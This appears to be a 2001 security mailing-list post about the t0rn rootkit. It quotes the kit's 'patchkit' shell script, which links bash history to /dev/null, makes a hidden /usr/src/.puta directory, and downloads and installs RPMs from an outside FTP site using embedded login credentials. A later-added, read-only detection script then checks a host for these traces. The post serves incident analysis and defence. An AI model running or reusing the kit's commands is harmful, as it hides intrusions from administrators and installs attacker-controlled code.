Re: rootkit entertainment

From: tmiller (tmillerat_private)
Date: Wed Jun 06 2001 - 06:05:25 PDT


    I saw this version of t0rn back in Feb. The attackers used t666.c to 
    exploit the box.
    
                                              Toby
    
    A patch found in the source....
    
    #!/bin/sh
    inf="Patchkit by beast"
    
    BLK=''
    RED=''
    GRN=''
    YEL=''
    BLU=''
    MAG=''
    CYN=''
    WHI=''
    DRED=''
    DGRN=''
    DYEL=''
    DBLU=''
    DMAG=''
    DCYN=''
    DWHI=''
    RES=''
     
    echo "${GRN}Patching Sequence Started..."
    echo "${YEL}Fixing history file in /bin"
    echo "${DRED}RE-Initiating bash_history..."
    echo "${GRN}Done, linked to /dev/null ;)"
    rm -rf /bin/.bash_history
    ln -s /dev/null /bin/.bash_history
    echo "${DRED}Creating temp path..."
    mkdir -p /usr/src/.puta/rpm
    echo "${DWHI}*${GRN}-Connected to dumpsite-${DWHI}*"
    echo "${DWHI}*************************"
    cd /usr/src/.puta/rpm
    echo "${DRED}Upgrading WU-FTP, Please hold"
    echo "${YEL}Fetching RPM file...${CYN}"
    ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/wu.rpm
    echo "${DRED}Executing WU upgrade...${GRN}"
    rpm -Uv wu.rpm
    echo "${DRED}Upgrading Statd, Please hold"
    echo "${YEL}Fetching RPM file...${CYN}"
    ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/stat.rpm
    echo "${DRED}Executing Statd upgrade...${GRN}"
    rpm -Uv stat.rpm
    echo "${DRED}Upgrading Vixie, Please hold"
    echo "${YEL}Fetching RPM file...${CYN}"
    ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/vixie.rpm
    echo "${DRED}Executing Vixie upgrade...${GRN}"
    rpm -Uv vixie.rpm
    echo "${DRED}Upgrading BIND, Please hold"
    echo "${YEL}Fetching RPM file...${CYN}"
    ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/bind.rpm
    echo "${DRED}Executing BIND upgrade...${GRN}"
    rpm -Uv bind.rpm
    echo "${DRED}Upgrading Imapd, Please hold"
    echo "${YEL}Fetching RPM file...${CYN}"
    ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/imap.rpm
    echo "${DRED}Executing Imapd upgrade...${GRN}"
    rpm -Uv imap.rpm
    echo "${DRED}Upgrading NC, Please hold"
    echo "${YEL}Fetching RPM file...${CYN}"
    ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/nc.rpm
    echo "${DRED}Executing NC upgrade...${GRN}"
    rpm -Uv nc.rpm
    echo "${YEL}Cleaning up old files..."
    rm -rf /usr/src/.puta/patch
    rm -rf /usr/src/.puta/rpm
    echo "${GRN}Patching done${RES}"
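
A read-only check for the two filesystem traces the script above leaves on a host, added here as an example and not part of the original post or the kit. The function names, the root-path argument and the extra history locations (/root, /home/*) are assumptions made for illustration; the demo tree is constructed.

```sh
#!/bin/sh
# Added example: read-only check for the traces the quoted script leaves.
# Pass "/" for a live host or the mount point of a disk image.

# Prints one line per finding; returns 1 if anything was found, 0 if clean.
scan_patchkit_traces() {
    root=${1:-/}
    root=${root%/}      # "/" becomes "", so "$root/bin" expands to "/bin"
    found=0

    # History file replaced by a symlink to /dev/null. The script does this
    # for /bin; /root and /home/* are an added generalization.
    for h in "$root"/bin/.bash_history "$root"/root/.bash_history \
             "$root"/home/*/.bash_history; do
        [ -L "$h" ] || continue
        if [ "$(readlink "$h")" = "/dev/null" ]; then
            echo "history-nulled: $h"
            found=1
        fi
    done

    # Staging directory: the script deletes .puta/rpm and .puta/patch,
    # but never /usr/src/.puta itself.
    if [ -d "$root/usr/src/.puta" ]; then
        echo "staging-dir: $root/usr/src/.puta"
        found=1
    fi

    [ "$found" -eq 0 ]
}

# Constructed tree (not real evidence) mimicking a host after the script ran.
make_demo_tree() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/bin" "$d/usr/src/.puta" "$d/home/alice"
    ln -s /dev/null "$d/bin/.bash_history"
    : > "$d/home/alice/.bash_history"   # ordinary file, must not be flagged
    echo "$d"
}

demo=$(make_demo_tree)
scan_patchkit_traces "$demo" || echo "traces found under $demo"
rm -rf "$demo"
```

A clean result only means these two traces are absent; the script also replaces packages with `rpm -Uv`, so package install times and file verification deserve a separate look.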
    



    This archive was generated by hypermail 2b30 : Wed Jun 06 2001 - 07:09:52 PDT